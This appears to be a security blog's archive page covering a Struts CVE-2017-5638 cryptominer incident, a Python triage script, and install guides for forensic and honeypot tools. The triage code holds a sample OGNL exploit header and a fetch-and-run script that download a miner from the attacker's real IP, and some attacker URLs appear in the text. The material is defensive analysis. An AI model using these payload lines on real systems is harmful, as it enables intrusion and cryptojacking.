Tag Archives: forensic

Shell hiding in image files

One day we noticed a strange GET request to our JBoss server:

From the request above you will quickly notice that this attack leverages the Apache Struts vulnerability CVE-2017-5638 (OGNL injection through a crafted Content-Type header, evaluated by the Jakarta Multipart parser).

The request tried to execute the command below (a wget download):

"-O FILE": write all fetched documents to FILE instead of separate files.
"-O -": with "-" as the file, the document is written to standard output (link conversion is disabled), which makes it easy to pipe straight into a shell.
"-q": quiet, no output.

As you can see, it tried to fetch an image (a JPEG file) from 91.230.47.41. Seems normal, right?
We fetched the file and took a look at it:

ASCII? Not JPEG? Hmm.
Here is what is inside the "logo.jpg" file:

We noticed that several other files are fetched by it, probably a config file and a binary.
Let's fetch those files!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

Not sure what it is. Probably the binary that runs as the mining process. Note the name: "kworker" imitates the kernel's worker threads, so a casual look at ps output does not give it away:
http://91.230.47.41/pics/kworker

Let's check whether the file is packed:

Yes, it is. So let's unpack it with UPX:

http://91.230.47.41/pics/kworker_na

Overall, it looks like the attacker wanted to compromise our servers and turn them into cryptocurrency mining machines.
Typical of the attacks we see at a time when cryptocurrency prices are rising: people hack for profit. 🙂

Here are the MD5 hashes for the files above:
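Two checks that would have caught this incident early, as an added example (not code from the original post): flag a Content-Type header carrying a CVE-2017-5638 OGNL payload, and classify a downloaded body by its leading bytes instead of trusting the ".jpg" in the URL. The sample header and the sample "logo.jpg" body below are constructed to resemble the attack; they are not the captured request or payload.

```python
"""Triage helpers for the incident described above (added example)."""
import re

# CVE-2017-5638: the Jakarta Multipart parser evaluates a crafted Content-Type
# header as OGNL while building its error message. Exploits start the header
# with %{ or ${ and usually disable the sandbox via #_memberAccess before
# running a command, so that is what we look for.
OGNL_RE = re.compile(
    r"[%$]\{.*?(#_memberAccess|#cmd=|@java\.lang\.Runtime|#context\[)",
    re.IGNORECASE | re.DOTALL,
)


def content_type_is_struts_ognl(header_value):
    """True when a Content-Type value carries an OGNL payload."""
    return bool(OGNL_RE.search(header_value))


# Leading-byte signatures. The extension in the URL is attacker-controlled;
# the first bytes of the body are not.
MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
    (b"\x7fELF", "elf"),
    (b"MZ", "pe"),
    (b"#!", "script"),
]
EXPECTED_BY_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}


def identify(blob):
    """Classify a downloaded body by its content, not by its name."""
    for magic, kind in MAGIC:
        if blob.startswith(magic):
            # UPX leaves its 'UPX!' marker inside the packed ELF (kworker above was packed this way)
            if kind == "elf" and b"UPX!" in blob:
                return "elf (UPX-packed)"
            return kind
    head = blob[:512]
    if head and all(b in b"\t\r\n" or 0x20 <= b < 0x7F for b in head):
        return "text"           # what `file` reports as ASCII text, like logo.jpg
    return "unknown"


def claimed_vs_actual(url, blob):
    """Return (actual kind, True if the URL's extension lied about it)."""
    name = url.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    actual = identify(blob)
    expected = EXPECTED_BY_EXT.get(ext)
    return actual, expected is not None and actual != expected


# Constructed samples (not the real captured data).
SAMPLE_HEADERS = {
    "benign": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "struts": "%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
              ".(#cmd='wget -O - -q http://91.230.47.41/pics/logo.jpg')"
              ".(#p=new java.lang.ProcessBuilder(#cmd).start())}",
}
FAKE_LOGO = (
    b"#!/bin/sh\n"
    b"wget -q http://91.230.47.41/pics/kworker.conf -O /tmp/kworker.conf\n"
    b"wget -q http://91.230.47.41/pics/kworker -O /tmp/kworker && chmod +x /tmp/kworker\n"
)


def triage():
    """Run both checks over the constructed samples and return the findings."""
    return {
        "benign_header_flagged": content_type_is_struts_ognl(SAMPLE_HEADERS["benign"]),
        "struts_header_flagged": content_type_is_struts_ognl(SAMPLE_HEADERS["struts"]),
        "logo": claimed_vs_actual("http://91.230.47.41/pics/logo.jpg", FAKE_LOGO),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

The header regex is deliberately loose (any `%{`/`${` followed by sandbox or command markers); on a WAF or in log triage that is the right trade-off, since a legitimate Content-Type never contains OGNL. The magic-byte check is the same idea `file` applied above: a "JPEG" that starts with `#!` or plain ASCII is a script.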

Installing bulk_extractor on Mac OS X

All references are taken from here: https://github.com/simsong/bulk_extractor/wiki/Installing-bulk_extractor

bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. The results can be easily inspected, parsed, or processed with automated tools.

To install bulk_extractor, first install the required libraries via MacPorts:

Also install the development libraries:

Download the libewf source code:

Then install libewf from source (because the libewf in ports is too old):
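To make the description above concrete ("extracts useful information without parsing the file system"), here is a miniature version of what bulk_extractor does, as an added example that is not bulk_extractor's own code: it scans a raw image byte by byte for e-mail addresses and URLs and records each hit with its byte offset and surrounding context, in the spirit of bulk_extractor's tab-separated feature files (offset, feature, context). The "disk image" is constructed inline, with the features sitting in unallocated-looking space that no file system parser would hand you.

```python
"""Bulk feature extraction over a raw image, no file system parsing (added example)."""
import re

# Scanners: one regex per feature type, applied to raw bytes.
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
SCANNERS = {"email": EMAIL_RE, "url": URL_RE}


def make_sample_image():
    """Constructed 'disk image': junk, zeroed space, then fragments that look like
    a mail header, an HTML snippet and a deleted-mail remnant. There is no
    real file system here, which is exactly the point."""
    junk = bytes(range(256)) * 4                       # 1024 bytes of every byte value
    img = bytearray(junk + b"\x00" * 512)
    img += b"From: alice@example.org\r\nTo: bob@example.net\r\n" + b"\x00" * 300
    img += b'<a href="http://91.230.47.41/pics/logo.jpg">x</a>' + b"\xff" * 200
    img += b"deleted mail fragment: carol@example.com said" + b"\x00" * 100
    return bytes(img)


def scan(image, context=16):
    """Return (offset, kind, feature, context) tuples sorted by offset."""
    features = []
    for kind, rx in SCANNERS.items():
        for m in rx.finditer(image):
            lo = max(0, m.start() - context)
            hi = min(len(image), m.end() + context)
            features.append((m.start(), kind, m.group(), image[lo:hi]))
    features.sort()
    return features


def to_feature_lines(features):
    """offset<TAB>feature<TAB>context, with non-printable context bytes escaped."""
    lines = []
    for off, _kind, feat, ctx in features:
        esc = ctx.decode("latin-1").encode("unicode_escape").decode("ascii")
        lines.append(f"{off}\t{feat.decode('latin-1')}\t{esc}")
    return lines


if __name__ == "__main__":
    for line in to_feature_lines(scan(make_sample_image())):
        print(line)
```

The offsets are what make this useful in forensics: once a feature is found you can map the byte offset back to a file (or to unallocated space) with a separate file system tool, which is the workflow bulk_extractor is designed for. The real tool adds many more scanners and decompresses embedded data recursively; the regex-over-raw-bytes core is the same.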

Dionaea simple analysis

Dionaea exploit analysis

We'll use the Python bundled with Dionaea:

It will open a Python console. Enter the code below line by line:


It will produce a test.bin file in the /tmp/ folder.

Now we analyze it and dump the output to another file:

You should see something like this:

As you can see, the malicious URL (defanged here) is hxxp://188.245.32.210:8147/kcfl

https://sourceforge.net/p/nepenthes/mailman/message/26862416/

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLquery
  • CleanMX

If you want to install maltrieve on your Mac OS X, here are the steps.

• First, install beautifulsoup4 via pip

• Install the required dependencies via apt-get (note that stock Mac OS X has no apt-get; the equivalent packages come from MacPorts or Homebrew)

• Download maltrieve from GitHub

Done. Now you can use maltrieve on your Mac OS X.

Script to install Thug honeypot on Ubuntu 12.04

Thug is a Python low-interaction honeyclient that mimics the behaviour of a web browser in order to detect and emulate malicious content. It is built on Python plus the V8 JavaScript engine. Have a look at the project website, or search for it, to learn more about this excellent tool.

So here I share a script that automates building and compiling the Thug honeypot and V8 on an Ubuntu machine:

#!/bin/bash
# Stop at the first failing step instead of carrying on with a half-built tree
set -e

# Install the dependencies needed for the build
sudo apt-get install -y autoconf build-essential git-core scons subversion libboost-dev libboost-python-dev libboost-thread-dev libboost-system-dev libtool mongodb python-bs4 python-chardet python-cssutils python-dev python-html5lib python-httplib2 python-zope.interface python-pymongo python-pefile python-setuptools

sudo easy_install beautifulsoup4

# Obtain libemu via git
cd /tmp/
git clone git://git.carnivore.it/libemu.git

# Configure, build and install libemu under /opt/libemu
cd /tmp/libemu/
autoreconf -v -i
./configure --enable-python-bindings --prefix=/opt/libemu
make
sudo make install
sudo ldconfig -n /opt/libemu/lib

# Obtain pylibemu via git
cd /tmp/
git clone https://github.com/buffer/pylibemu.git

# Register /opt/libemu/lib with the dynamic loader, then build and install pylibemu
cd /tmp/pylibemu/
sudo sh -c "echo /opt/libemu/lib > /etc/ld.so.conf.d/pylibemu.conf"
sudo ldconfig
python setup.py build
sudo python setup.py install

# Obtain Thug (git) and V8 (svn)
cd ~
git clone https://github.com/buffer/thug.git
cd ~/thug/
svn checkout http://v8.googlecode.com/svn/trunk/ v8

# Apply Thug's patch for V8
cp patches/V8-patch* .
patch -p0 < V8-patch1.diff
rm V8-patch*

# Build and install the Python wrapper for V8 (PyV8); this compiles the V8 engine as well
cd /tmp/
svn checkout http://pyv8.googlecode.com/svn/trunk/ pyv8
export V8_HOME=$HOME/thug/v8
cd pyv8
python setup.py build
sudo python setup.py install

I would really appreciate it if you could share your experience of using this software in production/real life. 🙂

Diskscrub – erase your drive until it cannot be recovered

Diskscrub

scrub overwrites hard disks, files, and other devices with repeating patterns intended to make recovering data from these devices more difficult. Although physical destruction is unarguably the most reliable method of destroying sensitive data, it is inconvenient and costly. For certain classes of data, organizations may be willing to do the next best thing, which is to scribble on all the bytes until retrieval would require heroic efforts in a lab.

So here I share the steps to install and use this software.
First, get the latest diskscrub from code.google.com/p/diskscrub/downloads/list

Then extract the archive with this command:

Then change into the scrub directory:

To use it, just type into the terminal:

--> where sda2 is the device you want to erase.
Be careful with the device name: scrub writes over whatever you point it at, and there is no undo.

You can list your drives with:
Mac OS X: diskutil list
Linux: fdisk -l

Delete file? Think again.

Have you ever wondered why, after you "permanently" delete a file from your computer, there are still programs that can recover it? What actually happens when you delete a file with Shift+Del or empty it from the Recycle Bin? The file's contents are still on your computer: the system only discards the metadata that records where the file's blocks are located on the HDD and marks those blocks as free. In other words, the file is marked as deleted, but its data has not been erased. You can no longer find the file by searching, because the system has removed its address, so virtually the file is gone, but physically it is still there.

You cannot erase those bytes yourself just by deleting the file. They are only destroyed when the computer needs that free space and writes new data (temporary files, new files) over it; the new data overwrites the blocks that were never physically cleared on the HDD.

The reliable way to remove such a file from the HDD is to overwrite its blocks with random data (random bytes) so that nothing of it remains. Once the blocks have been overwritten, the original contents are gone and only the random data is left in that area. Physically, you can never achieve this with Shift+Del or by emptying the Recycle Bin alone.

And that is exactly how "recovery software" finds files that we have only virtually deleted. It deep-scans every block of the hard disk looking for data the system has marked as deleted but has not yet overwritten, and rebuilds those files.

Take Windows as an example. Windows does not wipe freed blocks; it simply leaves them alone until it needs the space, at which point new data overwrites the old. So the chance of recovering a file you deleted by mistake is good? Yes 🙂 as long as the file has not yet been overwritten with new data. If you accidentally delete a file, recover it as soon as possible with recovery software, before it is overwritten, and in the meantime write as little as possible to that disk (ideally run the recovery tool from a different drive). Don't worry, there are plenty of free programs for this.

How do you overwrite deleted data with random bytes so that recovery software cannot get it back? There are many programs that delete files permanently, better known as "file shredder" or "secure delete" tools; well-known examples are "Eraser" (open source) and "CCleaner", which overwrite the old data with random bytes using one of several overwrite schemes. Plenty of free software exists for this too. One caveat: overwriting works on traditional hard disks, but on SSDs wear levelling and spare blocks mean the drive may keep a copy of the old data in cells the operating system cannot address, so for SSDs rely on the drive's built-in secure erase or on full-disk encryption instead.

Credit: to be updated once the original author of the article is found.